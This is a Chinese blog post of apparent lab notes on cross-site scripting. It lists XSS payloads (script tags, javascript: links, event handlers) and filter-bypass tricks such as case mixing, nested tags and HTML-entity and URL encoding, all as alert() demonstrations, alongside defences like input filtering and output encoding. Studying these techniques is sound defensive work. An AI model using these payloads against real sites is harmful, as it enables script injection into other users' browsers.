XSS 攻防

最新推荐文章于 2024-06-12 10:16:35 发布
最新推荐文章于 2024-06-12 10:16:35 发布
阅读量50 收藏
点赞数
分类专栏: # XSS 文章标签: xss 前端 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134320318
版权

XSS 攻防

XSS 构造方法

利用<>

用法

输入框上传的内容

<img src="">

<script></script>

……

示例
<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTi7NIssiejIpd06SibU5kbd5C0UWmsnQnRwYA9qmvLVtFYtRXiTZ05nNE_KHW9RXnPB5U&usqp=CAU">

image-20231109151402408

url 编码,提交,成功执行

image-20231109151637520

<script>alert("hacking!")</script>

image-20231109151947451

javascript 伪协议

可以通过URL 载入资源的标签。

<a href="javascript:alert(/gjl/)">XSS_TEST</a>

image-20231109152558772

事件响应

事件类型说明
windows 事件对window 对象触发的事件
Form 事件HTML 表单内触发的事件
Keyboard 事件键盘事件
Mouse 事件鼠标事件
Media 事件由多媒体触发的事件
鼠标移动到图片上触发
<img src="" onmouseover="alert(/attacked!!!/)">
键盘按下触发
<input onkeydown="alert(/attacked!!!/)">
键盘释放触发
<input onkeyup="alert('attacked!!!')">
……

image-20231109154322094

输入框内按下键盘立即触发

image-20231109154359620

松开键盘触发

image-20231109154503040

XSS 变形方式

大小写转换

浏览器对 HTML 标签大小写不敏感

<ScrIPt></SCrIpT>
<img src="#" ONerror="">

关键字双写

绕过一次过滤

<scr<script>ipt>

伪协议进行转码

单个替换被过滤的字符

HTML 编码:

字母ASCII码十进制编码十六进制编码
a97&#97;&#x61;
c99&#99;&#x63;
e101&#101;&#x65;

其他编码:

  • utf-8 编码
  • utf-7 编码

引号的使用

  • 没有引号
  • 单引号
  • 双引号
<Img sRc=# OnErRoR=alert(/xss/);>
<Img sRc = '#' OnErRoR='alert(/xss/)'>
<Img sRc = "#" OnErRoR="alert(/xss/)">

/代替空格

 <Img/sRc='#'/OnErRoR='alert(/xss/)'>

XSS 防御

​ XSS 过滤器的作用是过滤用户(浏览器客户端)提交的有害信息,从而达到防范XSS 攻击的效果。

输入过滤

  • 仅接受指定长度;
  • 仅包含合法字符;
  • 仅接收指定范围;
  • 特殊的格式,例如,email、IP 地址。

输出编码

将特殊字符转换为 HTML 实体,从而可以在 HTML 页面中安全地显示这些字符,避免被误解为 HTML 标记或 JavaScript 代码

$keywords = htmlspecialchars( $_GET[ 'keywords' ] );

黑白名单策略

不管是采用输入过滤还是输出编码,都是针对用户提交的信息进行黑、白名单式的过滤:

  • 黑名单:非允许的内容
  • 白名单:允许的内容

防御 DOM 型 XSS

避免客户端文档重写,重定向或其他敏感操作。

XSS 攻防实例

过滤<script>关键字

image-20231109164422068

直接输入<script>alert("gjl")</script>时 script 标签被过滤

image-20231109164701916

可以使用大小写转换进行绕过

image-20231109164855477

不区分大小写过滤

可以使用双写绕过

在正则表达式中,i 是一个修饰符,表示进行不区分大小写的匹配

源码中开启不区分大小写过滤,大小写转换的绕过方式不再适用

image-20231109170832003

image-20231109165134456

双写绕过

image-20231109170911103

正则匹配所有<script> 标签中的字符

image-20231109171229488

image-20231109171302166

利用事件绕过

<input onfocus="alert(/hacking!!!/)">

image-20231109193844662

正则匹配<script>+on过滤

image-20231109193835018

加大小写绕过

image-20231109193922702

正则匹配<script>+on过滤+大小写过滤

对伪协议编码

image-20231109194002140

image-20231109194043064

// 攻击代码
<a href="javascript:alert(/hacking!!!/)">click<a>

// 将被过滤的字符转为十进制
<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert(/hacking!!!/)">click<a>

// url 编码
%3Ca%20href%3D%22%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%3Aalert(%2Fhacking!!!%2F)%22%3Eclick%3Ca%3E

image-20231109195011408

url编码

<img ondbclixk="alert(/xss/)">

image-20231109141554450

地址错误,载入失败触发onerror

<input onkeydown="alert">

image-20231109141918469

image-20231109142127910

image-20231109142731178

Not Found - PortSwigger

正则匹配

image-20231109171229488

编码

?keywords=%26%2360%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2362%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2347%3B%26%23103%3B%26%23106%3B%26%23108%3B%26%2347%3B%26%2341%3B%26%2360%3B%26%2347%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2362%3B

直接显示不执行

image-20231109175007563

gjl_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CSRF与XSS攻防知识点总结
小青蛙的博客
12-16 533
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Ma...
XSS攻防实战
troy
09-10 673
XSS 的全称叫跨站脚本攻击(Cross Site Scripting),攻击出现的原因一般是因为 Web 程序对用户的输入过滤不足导致的一种漏洞,攻击者可以把恶意的脚本代码注入到网页之中,当其他用户浏览时就会执行其中的恶意代码,对受害者产生各种攻击。XSS 一般分为三种类型: 反射型 存储型 DOM型 反射型 XSS 攻防实战 反射型 XSS 攻击的恶意脚本并没有被存储到后端数据库中,而是诱导用户点击某个精心拼接的恶意链接,从而达到攻击的目的。 攻击案例 一个常见的场景是用户在某电影网站搜索,假如
Web安全XSS攻防
踏步修行
05-20 220
Web安全XSS攻防 1. XSS的定义 跨站脚本攻击(Cross Site Scripting),缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 2. XSS的原理 攻击者对含有漏洞的服务器发起XSS攻击(注入JS代码)。 诱使受害者打开受到攻击的服务器URL。 受害者在Web浏览...
XSS 攻击
白菜执笔人的博客
03-03 793
Web安全攻防 学习笔记 一、XSS 攻击 1.1、实验环境介绍         地址:https://xss-quiz.int21h.jp/ 1.2、探测 XSS 过程 构造一个不会被识别为恶意代码的字符串提交到页面中 使用浏览器审查工具进行代码审查,寻找构造的字符串是否在页面中显示 1.3、闭合文本标签利用 XSS   ...
XSS攻防手册
12-30
XSS 攻击与防御手册 无聊看看 只想弄个积分 不用搞了吧
米斯特 xss
05-03
米斯特的xss进阶教程~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~·~~
XSS学习大全
05-02
XSS学习大全,攻防入门,轻松上手,简单易学,推荐下载
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
18.XSS跨站脚本攻击原理及代码攻防演示(一)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。一.什么是XSS
csrf与xss差别 别在弄乱了 直接靶场实操pikachu的csrf题 token绕过可以吗???
helloKittywz的博客
06-09 1387
我们现在来说说这2个之间的关系,因为昨天的我也没有弄清楚这2者的关系,总感觉迷迷糊糊的。xss这个漏洞是大家并不怎么陌生,导致xss漏洞的产生是服务器没有对用户提交数据过滤不严格,导致浏览器把用户输入的当作js代码返回客户端进行执行,这样就导致了攻击。xss(跨站脚本攻击)可以说简单一点前端js代码可以干什么我们就可以干什么,我们可以获取到用户的cookie,获取键盘记录,钓鱼等等的操作我们来说说csrf这个漏洞csrf(跨站请求伪造)这个是利用用户的。
DOM型xss靶场实验
qq_64302290的博客
06-08 1078
DOM型xss可以使用js去控制标签中的内容。
laravel8使用中间件实现xss处理
janthinasnail的博客
06-06 429
2、编辑app/Http/Middleware/XSSClean.php文件。3、配置app/Http/Kernel.php文件。
33 _ 跨站脚本攻击(XSS):为什么Cookie中有HttpOnly属性?
qq_46143850的博客
06-11 793
XSS全称是Cross Site Scripting,为了与“CSS”区分开来,故简称XSS,翻译过来就是“跨站脚本”。XSS攻击是指黑客往HTML文件中或者DOM中注入恶意脚本,从而在用户浏览页面时利用注入的恶意脚本对用户实施攻击的一种手段。最开始的时候,这种攻击是通过跨域来实现的,所以叫“跨域脚本”。但是发展到现在,往HTML文件中注入恶意代码的方式越来越多了,所以是否跨域注入脚本已经不是唯一的注入手段了,但是XSS这个名字却一直保留至今。
XSS(跨站脚本攻击)
guowu666的博客
06-10 1318
xss基础
[Vue-常见错误]浏览器显示Uncaught runtime errors
一个喜欢什么都研究一下的小小后端程序员
06-09 332
在vue.config.js中配置关闭Uncaught runtime errors显示。
JS中一个dom元素能绑定多少事件
ggq53219的博客
06-10 505
在JavaScript中,一个DOM元素可以绑定的事件数量并没有明确的限制,这主要取决于浏览器的实现和内存限制。然而,在实际应用中,为同一个DOM元素绑定过多的事件监听器可能会导致性能问题,尤其是在事件处理函数执行复杂操作的情况下。总之,虽然JavaScript中DOM元素可以绑定的事件数量没有明确的限制,但在实际应用中应注意避免过度绑定和优化事件处理函数,以确保良好的性能和用户体验。
vue3如何定义一个组件
Java程序员专栏
06-09 525
注意在子组件的 <template> 中,你使用 {{ propName }} 来显示传递进来的参数值。在父组件中,你使用 :propName="parentMessage" 来将 parentMessage 数据的值绑定到子组件的 propName prop 上。当使用 <script setup> 语法糖时,你不能直接在 <script> 标签内使用 props 选项。在 Vue 3 中,定义一个可以接收参数的组件通常是通过在组件的 props 选项中定义这些参数来完成的。// 其他组件逻辑...
Web前端设计大赛:创意与技术的碰撞
最新发布
huejiaqwerty888的博客
06-12 313
在这场竞赛中,参赛者们不仅需要展现出独特的创意,还需要运用精湛的技术将创意转化为实际作品。本文将从四个方面、五个方面、六个方面和七个方面,深入剖析Web前端设计大赛的魅力和挑战。交互设计是Web前端设计的核心环节。参赛者需要关注页面的加载速度、响应速度以及操作的便捷性等方面,确保用户在使用过程中能够获得良好的体验。参赛者需要敢于突破传统的设计理念和技术限制,尝试新的设计手法和技术应用。参赛者需要在创意构思、视觉呈现、交互设计、用户体验、技术实现、性能优化以及创新性和可实践性等方面进行全面考虑和精心打造。
python安全攻防
09-01
引用中提到了Python的用途,引用中提到了Python的前景,但是没有提到Python的安全攻防方面。对于Python的安全攻防,Python本身并不具备特定的安全机制,它更多地被用于开发安全工具和应用程序。以下是一些与Python安全攻防相关的话题: 1. 网络安全与漏洞分析:Python可以用于编写网络安全工具,如漏洞扫描器、网络侦查工具等。通过使用Python的网络库和模块,可以实现对网络协议的分析和安全测试。 2. 密码学与数据加密:Python提供了丰富的密码学库和算法,可以进行数据加密、解密和哈希等操作。Python的加密库可以用于开发安全的通信协议和数据存储方案。 3. Web应用安全:Python可以用于开发安全Web应用程序,并提供了一些框架和库来帮助处理常见的Web安全问题,如跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等。 4. 数据分析与安全监控:Python在数据分析领域有很强的应用能力,可以用于安全事件日志分析和入侵检测等任务。通过使用Python的数据分析库,可以发现异常行为和潜在的安全威胁。 总而言之,Python在安全领域有广泛的应用。它可以用于开发安全工具、应用程序和解决方案,帮助实现网络安全、数据安全和应用安全等方面的需求。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [python:网络安全攻击与防御的工具(附零基础学习资料)](https://blog.csdn.net/weixin_49892805/article/details/127758885)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值